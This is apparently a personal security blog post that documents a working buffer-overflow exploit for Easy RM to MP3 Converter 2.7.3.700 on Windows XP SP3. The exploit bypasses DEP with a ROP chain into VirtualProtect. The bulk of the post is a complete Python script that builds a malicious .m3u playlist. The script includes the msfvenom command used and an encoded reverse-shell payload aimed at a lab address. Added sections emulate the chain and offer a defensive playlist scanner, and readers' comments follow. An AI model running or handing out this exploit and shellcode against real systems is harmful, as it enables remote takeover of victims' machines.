Easy RM to MP3 Converter Buffer Overflow Vulnerability (DEP Bypass using ROP)

I wanted to learn and practice the DEP bypass technique, so I decided to try it on Easy RM to MP3 Converter version 2.7.3.700 (2006.09.29). I started off with a PoC and modified it for DEP bypass.

I tried it all manually first and could craft all of the parameters required for VirtualProtect() successfully, but then something went wrong inside VirtualProtect(). Maybe because EBP was misaligned.

I was running out of time, so I decided to learn !mona rop and spend some time fixing the rop_chain it created. And the result is here ;):

[Screenshot 2019-11-30 at 10.21.29 PM]

[Screenshot 2019-11-30 at 10.38.24 PM: Shellcode + Game Over!]

Here’s the exploit code:

#!/usr/bin/env python2
# Python 2 script: the payload is built from str, which is a byte string in Python 2
import struct


#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.102 LPORT=443 -e x86/alpha_mixed -f python > temp.txt
#Payload size: 710 bytes
#Run it and check the base address of the shellcode; in my case it's 0x0010F80C

shellcode =  ""
shellcode += "\x89\xe5\xda\xcd\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x49\x78\x6c"
shellcode += "\x42\x37\x70\x55\x50\x67\x70\x35\x30\x6e\x69\x69\x75"
shellcode += "\x55\x61\x79\x50\x73\x54\x6c\x4b\x52\x70\x44\x70\x6c"
shellcode += "\x4b\x66\x32\x64\x4c\x6c\x4b\x61\x42\x64\x54\x4e\x6b"
shellcode += "\x74\x32\x61\x38\x34\x4f\x68\x37\x71\x5a\x64\x66\x76"
shellcode += "\x51\x6b\x4f\x6c\x6c\x57\x4c\x71\x71\x33\x4c\x54\x42"
shellcode += "\x66\x4c\x45\x70\x4a\x61\x38\x4f\x56\x6d\x56\x61\x69"
shellcode += "\x57\x49\x72\x79\x62\x52\x72\x76\x37\x6e\x6b\x56\x32"
shellcode += "\x62\x30\x6e\x6b\x31\x5a\x47\x4c\x6c\x4b\x72\x6c\x37"
shellcode += "\x61\x43\x48\x38\x63\x53\x78\x35\x51\x5a\x71\x62\x71"
shellcode += "\x4e\x6b\x73\x69\x57\x50\x67\x71\x78\x53\x6e\x6b\x37"
shellcode += "\x39\x77\x68\x6b\x53\x57\x4a\x72\x69\x4c\x4b\x54\x74"
shellcode += "\x6c\x4b\x47\x71\x78\x56\x35\x61\x59\x6f\x6c\x6c\x5a"
shellcode += "\x61\x4a\x6f\x74\x4d\x36\x61\x4f\x37\x67\x48\x79\x70"
shellcode += "\x30\x75\x4b\x46\x57\x73\x63\x4d\x5a\x58\x77\x4b\x53"
shellcode += "\x4d\x45\x74\x31\x65\x49\x74\x31\x48\x4c\x4b\x32\x78"
shellcode += "\x46\x44\x45\x51\x4e\x33\x33\x56\x6e\x6b\x44\x4c\x70"
shellcode += "\x4b\x4e\x6b\x46\x38\x65\x4c\x57\x71\x7a\x73\x4c\x4b"
shellcode += "\x64\x44\x4c\x4b\x46\x61\x6a\x70\x6d\x59\x50\x44\x67"
shellcode += "\x54\x76\x44\x61\x4b\x53\x6b\x75\x31\x31\x49\x71\x4a"
shellcode += "\x32\x71\x69\x6f\x6b\x50\x51\x4f\x31\x4f\x32\x7a\x4e"
shellcode += "\x6b\x72\x32\x4a\x4b\x6e\x6d\x33\x6d\x75\x38\x70\x33"
shellcode += "\x74\x72\x57\x70\x57\x70\x30\x68\x54\x37\x44\x33\x54"
shellcode += "\x72\x61\x4f\x42\x74\x73\x58\x70\x4c\x53\x47\x61\x36"
shellcode += "\x56\x67\x39\x6f\x4e\x35\x48\x38\x7a\x30\x33\x31\x35"
shellcode += "\x50\x65\x50\x37\x59\x69\x54\x73\x64\x32\x70\x35\x38"
shellcode += "\x67\x59\x4f\x70\x70\x6b\x55\x50\x59\x6f\x38\x55\x46"
shellcode += "\x30\x66\x30\x42\x70\x62\x70\x61\x50\x46\x30\x73\x70"
shellcode += "\x62\x70\x72\x48\x78\x6a\x56\x6f\x6b\x6f\x4b\x50\x79"
shellcode += "\x6f\x48\x55\x4e\x77\x52\x4a\x56\x65\x42\x48\x39\x50"
shellcode += "\x69\x38\x54\x78\x33\x56\x42\x48\x54\x42\x55\x50\x37"
shellcode += "\x71\x4d\x6b\x6f\x79\x58\x66\x62\x4a\x44\x50\x56\x36"
shellcode += "\x66\x37\x43\x58\x5a\x39\x4e\x45\x53\x44\x61\x71\x49"
shellcode += "\x6f\x59\x45\x4f\x75\x39\x50\x50\x74\x36\x6c\x49\x6f"
shellcode += "\x62\x6e\x36\x68\x52\x55\x4a\x4c\x71\x78\x4a\x50\x4f"
shellcode += "\x45\x39\x32\x56\x36\x49\x6f\x5a\x75\x52\x48\x62\x43"
shellcode += "\x72\x4d\x65\x34\x57\x70\x4b\x39\x4b\x53\x52\x77\x42"
shellcode += "\x77\x36\x37\x45\x61\x59\x66\x33\x5a\x52\x32\x51\x49"
shellcode += "\x70\x56\x6a\x42\x49\x6d\x71\x76\x69\x57\x33\x74\x54"
shellcode += "\x64\x55\x6c\x33\x31\x33\x31\x4e\x6d\x72\x64\x46\x44"
shellcode += "\x52\x30\x5a\x66\x67\x70\x63\x74\x72\x74\x46\x30\x52"
shellcode += "\x76\x76\x36\x43\x66\x42\x66\x72\x76\x72\x6e\x70\x56"
shellcode += "\x63\x66\x73\x63\x70\x56\x51\x78\x62\x59\x4a\x6c\x65"
shellcode += "\x6f\x6f\x76\x79\x6f\x79\x45\x6e\x69\x6b\x50\x70\x4e"
shellcode += "\x61\x46\x72\x66\x4b\x4f\x76\x50\x75\x38\x67\x78\x4b"
shellcode += "\x37\x75\x4d\x75\x30\x79\x6f\x4e\x35\x4d\x6b\x78\x70"
shellcode += "\x78\x35\x6c\x62\x56\x36\x70\x68\x6c\x66\x6d\x45\x6f"
shellcode += "\x4d\x4d\x4d\x6b\x4f\x69\x45\x47\x4c\x64\x46\x51\x6c"
shellcode += "\x44\x4a\x4f\x70\x49\x6b\x49\x70\x74\x35\x36\x65\x6f"
shellcode += "\x4b\x31\x57\x77\x63\x32\x52\x42\x4f\x71\x7a\x35\x50"
shellcode += "\x36\x33\x79\x6f\x39\x45\x41\x41"



def create_rop_chain():

  '''
   --- alternative chain ---
   EAX = ptr to &VirtualProtect()
   ECX = lpOldProtect (ptr to W address)
   EDX = NewProtect (0x40)
   EBX = dwSize
   ESP = lPAddress (automatic)
   EBP = POP (skip 4 bytes)
   ESI = ptr to JMP [EAX]
   EDI = ROP NOP (RETN)
   + place ptr to "jmp esp" on stack, below PUSHAD
  --------------------------------------------


  '''

  # rop chain generated with mona.py - www.corelan.be

  #This needed a little fix
  rop_gadgets = [
    #[---INFO:gadgets_to_set_esi:---]
    #0x00000000,  # [-] Unable to find API pointer -> eax,    EAX = ptr to &VirtualProtect()
    
    0x1002a21d,  # POP EAX # RETN    ** [MSRMfilter03.dll] **   |   {PAGE_EXECUTE_READ}
    0x7C801AD4,  # address of kernel32!VirtualProtect() on Windows XP SP3 (not an IAT pointer as in mona's template: this chain returns straight into it, see ESI below)
  
    #ESI = &VirtualProtect(). After PUSHAD # RETN, the RETN pops EDI (a ROP NOP) and then ESI, so execution enters VirtualProtect() directly with the rest of the PUSHAD frame as its arguments
    0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
    0x41414141,  # Filler (compensate for the extra POP EBP)
    0x41414141,  # Filler (compensate for the extra POP EBX)
    0x41414141,  # Filler (compensate for the extra POP ECX)

    #[---INFO:gadgets_to_set_ebp:---]   EBP = return address for VirtualProtect(): PUSH ESP # RET re-enters the stack right after the PUSHAD frame
    0x1002e79b,  # POP EBP # RETN [MSRMfilter03.dll] 
    0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
    
    #[---INFO:gadgets_to_set_ebx:---]   EBX = dwSize, which is 0x201
    0x10029822,  # POP EAX # RETN [MSRMfilter03.dll] 
    0x41f10201,  # put delta into eax (0x41f10201 + 0xBE0F0000 wraps to 0x00000201 -> put 0x00000201 into ebx)
    0x10027682,  # ADD EAX,BE0F0000 # RETN [MSRMfilter03.dll] 
    0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
    0x41414141,  # Filler (skipped by ADD ESP,8)
    0x41414141,  # Filler (skipped by ADD ESP,8)

    #[---INFO:gadgets_to_set_edx:---],   EDX = NewProtect (0x40).  XOR EDX and then keep incrementing until it's 0x40
    #0x00000000,  # [-] Unable to find gadget to put 00000040 into edx
    0x77c576ec,  # XOR EDX,EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}
    0x77c127d5,  # INC EDX # RETN    ** [msvcrt.dll] **   |   {PAGE_EXECUTE_READ}    


    #[---INFO:gadgets_to_set_ecx:---]   ECX = lpOldProtect (ptr to a writable dword where VirtualProtect() stores the previous protection)
    0x100241c3,  # POP ECX # RETN [MSRMfilter03.dll] 
    0x10064511,  # &Writable location [MSRMfilter03.dll]
    

    #[---INFO:gadgets_to_set_edi:---],        EDI = ROP NOP (RETN)
    0x1002bff9,  # POP EDI # RETN [MSRMfilter03.dll] 
    0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
    

    #[---INFO:gadgets_to_set_eax:---]   EAX = NOPs: after VirtualProtect() returns, PUSH ESP # RET lands on this dword, which is executed and flows into the NOP sled
    0x10029822,  # POP EAX # RETN [MSRMfilter03.dll] 
    0x90909090,  # nop
    

    #[---INFO:pushad:---]   PUSH all of the GP registers onto the stack to craft the parameters required for VirtualProtect()
    #0x00000000,  # [-] Unable to find pushad gadget
    0x77c12df9,  # PUSHAD # RETN [msvcrt.dll] 

  ]
  return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  


def main():

  filename = "rop.m3u"
  buffer_size = 26072   # Offset to EIP, found by pattern_offset.rb
  nops = "\x90" * 240
  junk = "Z" * buffer_size
  eip = struct.pack('<I', 0x100102DC)        # 0x100102DC -> RETN: return into the stack, where the ROP chain begins
  junk2 = "AAAA"    # Compensate, to make sure ESP points at the first ROP gadget
  rest  = "C" * 292   # This is to compensate for the extra 8 bytes of NOP sled added before rop2

  rop_chain = create_rop_chain()

  payload = junk + eip + junk2 + rop_chain + nops + shellcode + rest
  print("\n[+] Payload size: %d" % len(payload))
  print("[+] Shellcode size: %d" % len(shellcode))

  # Binary mode: the payload is raw bytes and must not go through newline translation
  with open(filename, "wb") as f:
    f.write(payload)

  print("\n[+] %s created successfully!" % filename)

if __name__ == '__main__':
  main()
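To see what this chain actually hands to VirtualProtect(), here is a small symbolic interpreter that walks the gadget list above and reports the frame left on the stack by PUSHAD # RETN. This is an added example written for this page, not the author's code and not mona output: the effect of each gadget is transcribed from the comments on the chain, only the seven general registers and a chain index are tracked, and the stack address of the first chain dword (chain_addr) is an assumption since the real value depends on the process. It shows that the chain returns into ESI (the 0x7C801AD4 value) directly, that EBX and EDX really end up as 0x201 and 0x40, and that the 0x90909090 "EAX" slot is the first thing executed once PUSH ESP # RET brings control back to the stack.

```python
"""Symbolic walk of the page's VirtualProtect ROP chain (added example, not the author's code)."""
import struct

MASK = 0xFFFFFFFF
PAGE_EXECUTE_READWRITE = 0x40          # the flNewProtect value the chain builds in EDX
PUSHAD_RETN = 0x77c12df9               # PUSHAD # RETN [msvcrt.dll]


def pop(st):
    """Consume the next chain dword, as a POP/RETN at this position would."""
    v = st["chain"][st["sp"]]
    st["sp"] += 1
    return v


def set_reg(name):
    """Handler factory for the plain 'POP <reg> # RETN' gadgets."""
    return lambda st: st["regs"].__setitem__(name, pop(st))


def push_eax_pop_esi(st):
    # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN
    r = st["regs"]
    r["esi"] = r["eax"]
    r["ebp"], r["eax"] = pop(st), 1
    r["ebx"], r["ecx"] = pop(st), pop(st)


def push_eax_pop_ebx(st):
    # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN
    r = st["regs"]
    r["ebx"], r["eax"] = r["eax"], 1
    st["sp"] += 2                      # ADD ESP,8 steps over two filler dwords


GADGETS = {
    0x1002a21d: set_reg("eax"),
    0x10029822: set_reg("eax"),
    0x1002e79b: set_reg("ebp"),
    0x100241c3: set_reg("ecx"),
    0x1002bff9: set_reg("edi"),
    0x1001a788: push_eax_pop_esi,
    0x1001bdee: push_eax_pop_ebx,
    0x10027682: lambda st: st["regs"].__setitem__(
        "eax", (st["regs"]["eax"] + 0xBE0F0000) & MASK),   # ADD EAX,BE0F0000 # RETN
    0x77c576ec: lambda st: st["regs"].__setitem__("edx", 0),  # XOR EDX,EDX # RETN
    0x77c127d5: lambda st: st["regs"].__setitem__(
        "edx", (st["regs"]["edx"] + 1) & MASK),              # INC EDX # RETN
}


def chain_dwords():
    """The page's gadget list, rebuilt with the 64 INC EDX gadgets generated in a loop."""
    return ([0x1002a21d, 0x7C801AD4,
             0x1001a788, 0x41414141, 0x41414141, 0x41414141,
             0x1002e79b, 0x1001b058,
             0x10029822, 0x41f10201, 0x10027682, 0x1001bdee, 0x41414141, 0x41414141,
             0x77c576ec] + [0x77c127d5] * 64 +
            [0x100241c3, 0x10064511,
             0x1002bff9, 0x1001c121,
             0x10029822, 0x90909090,
             PUSHAD_RETN])


def pack_chain(chain):
    """Same serialisation as the page's create_rop_chain(), but returning bytes."""
    return b"".join(struct.pack("<I", d) for d in chain)


def run_chain(chain, chain_addr=0x0010F000):
    """Emulate the chain up to PUSHAD and return the VirtualProtect() frame it produces.

    chain_addr is an assumed stack address of the first chain dword; only the
    layout relative to it matters for the result."""
    st = {"chain": chain, "sp": 0,
          "regs": {k: 0 for k in ("eax", "ecx", "edx", "ebx", "ebp", "esi", "edi")}}
    while True:
        gadget = pop(st)
        if gadget == PUSHAD_RETN:
            break
        GADGETS[gadget](st)            # KeyError: a gadget the table does not model
    r = st["regs"]
    esp = chain_addr + 4 * st["sp"]    # ESP when PUSHAD executes: just past the chain
    # PUSHAD stores EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI downwards, so EDI ends up lowest.
    # RETN pops EDI (a RETN gadget, i.e. a ROP NOP), that RETN pops ESI, and ESI is
    # &VirtualProtect, so the API runs with the remaining dwords as its frame.
    return {
        "callee": r["esi"],
        "return_addr": r["ebp"],       # PUSH ESP # RET: re-enters the stack after the frame
        "lpAddress": esp,              # ESP slot: the stack region holding NOP sled + shellcode
        "dwSize": r["ebx"],
        "flNewProtect": r["edx"],
        "lpOldProtect": r["ecx"],
        "landing_dword": r["eax"],     # EAX slot: executed first after PUSH ESP # RET ...
        "landing_addr": esp - 4,       # ... and it sits 4 bytes below the NOP sled
        "chain_bytes": 4 * st["sp"],
    }


if __name__ == "__main__":
    for k, v in run_chain(chain_dwords()).items():
        print("%-14s 0x%08x" % (k, v))
```

Running it prints the six dwords VirtualProtect() sees plus where control lands afterwards; `chain_bytes` comes out at 344, which is the size `create_rop_chain()` contributes to the payload, so `lpAddress` is exactly where the 240-byte NOP sled starts.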

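From the defender's side, the trigger is a playlist entry that is nothing like a path or URL: 26072 bytes of padding followed by binary gadget addresses and a NOP sled. The following heuristic scanner, an added example and not part of the original post, flags .m3u entries by length, by long runs of one repeated byte, and by bytes that are not valid text. The thresholds (MAX_ENTRY_LEN, MAX_BYTE_RUN) are assumptions, and both sample files are constructed here; the suspect one only mimics the shape of the page's payload (padding, NOP sled, the first decoder bytes of the shellcode).

```python
"""Heuristic scan of an .m3u playlist for entries that cannot be real paths or URLs (added example)."""

MAX_ENTRY_LEN = 4096      # assumed: Windows paths stop at MAX_PATH (260), URLs rarely exceed 2 KB
MAX_BYTE_RUN = 64         # assumed: no genuine path repeats a single byte this often


def longest_run(b):
    """Length of the longest run of one repeated byte value in b."""
    best = cur = 0
    prev = None
    for c in b:
        cur = cur + 1 if c == prev else 1
        prev = c
        best = max(best, cur)
    return best


def scan_m3u(data, max_len=MAX_ENTRY_LEN, max_run=MAX_BYTE_RUN):
    """Return [(line_no, [reasons])] for playlist entries that look like attack padding.

    Comment/directive lines (#EXTM3U, #EXTINF:...) are skipped; everything else
    should be a path or URL, i.e. short, valid UTF-8 text without control bytes."""
    findings = []
    for no, line in enumerate(data.splitlines(), 1):
        if not line or line.startswith(b"#"):
            continue
        reasons = []
        if len(line) > max_len:
            reasons.append("oversized")
        if longest_run(line) > max_run:
            reasons.append("long-byte-run")
        try:
            text = line.decode("utf-8")
        except UnicodeDecodeError:
            reasons.append("not-utf8")
        else:
            if any(ord(ch) < 0x20 and ch != "\t" for ch in text):
                reasons.append("control-bytes")
        if reasons:
            findings.append((no, reasons))
    return findings


# Constructed samples: an ordinary playlist, and one entry shaped like the page's
# payload (26072 bytes of padding, a 240-byte NOP sled, the first decoder bytes).
BENIGN = (b"#EXTM3U\n"
          b"#EXTINF:213,Some Artist - Some Song\n"
          b"C:\\Music\\some_song.mp3\n"
          b"http://example.invalid/stream.mp3\n")
SUSPECT = b"Z" * 26072 + b"\x90" * 240 + b"\x89\xe5\xda\xcd\xd9"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_m3u(sample) or "clean")
```

The three reasons are reported together so a triage rule can require more than one of them: a single long but valid URL would only trip "oversized", while padding-plus-shellcode trips all three.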

2 thoughts on “Easy RM to MP3 Converter Buffer Overflow Vulnerability (DEP Bypass using ROP)”

    1. @francesco, If I remember correctly, I created this rop chain by instructing Mona to use gadgets/instructions from MSRMfilter03.dll and MSVCRT.DLL. Also, I chose the Python one that uses VirtualProtect().

      I did it on Windows XP SP3 and it may look a bit different on other versions of Windows. Is your ROP chain not working?
